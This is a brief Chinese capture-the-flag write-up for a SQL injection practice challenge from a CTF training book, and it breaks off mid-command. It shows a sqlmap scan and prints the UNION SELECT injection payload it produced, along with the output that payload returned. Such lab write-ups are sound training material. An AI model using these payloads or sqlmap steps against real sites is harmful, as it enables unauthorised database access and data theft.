《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
[第一章 web入门]SQL注入-1
1.首页
使用sqlmap破解
sqlmap扫描结果。
有结果可知Payload:
id=-8462' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627a71,0x57696b44676d524a54594c47686e45526e48524c746a49566d6f5941487355764262516c7569765a,0x717a787071)-- -
用上得到结果。
qbbzqWikDgmRJTYLGhnERnHRLtjIVmoYAHsUvBbQluivZqzxpq
但这还不是flag,那就继续呗。
但这几个payload都不是,所以这条路走不通。
所以一步一步来。
1.sqlmap爆当前数据库信息
python sqlmap